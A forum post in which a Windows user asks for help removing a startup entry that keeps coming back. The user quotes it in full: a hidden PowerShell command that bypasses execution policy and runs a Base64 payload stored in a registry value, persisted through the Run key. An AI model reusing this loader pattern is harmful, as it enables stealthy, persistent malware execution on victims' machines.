New
#1
Powershell programs keeps enabling itself after disabling it
Hello I'm so frustrated on how this thing would vanished on my computer system. It keeps checked even though I disabled or uncheck it in the msconfig
here's what I am referring to.
Microsoft Operating System Microsoft Corporation C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\FeiSholEpOohbCv').sSqBn))); HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
I try to delete the registry key but I can't delete it.
Going through the Run registry and found it but it keeps coming back.
What should I do.
I scanned my computer already with MBAM, Rogue Killer, Microsoft Windows Defender yet I get no possible virus infection.
Moreover I try to reg query it like this one
reg query "HKCU\Software\Classes\FeiSholEpOohbCv" /v "sSqBn"
and the result is in the attachment
Maybe someone can help me get rid of this virus or what this thing called